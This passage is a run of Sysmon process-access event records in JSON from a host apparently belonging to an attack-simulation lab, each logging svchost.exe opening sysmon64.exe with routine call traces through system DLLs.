-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1451,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.754\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.754","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1452,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.754\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.754","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1453,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.754\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.754","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1454,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.754\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.754","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1455,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.756\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.756","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1456,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.756\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.756","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1457,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.756\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.756","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1458,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.756\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.756","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
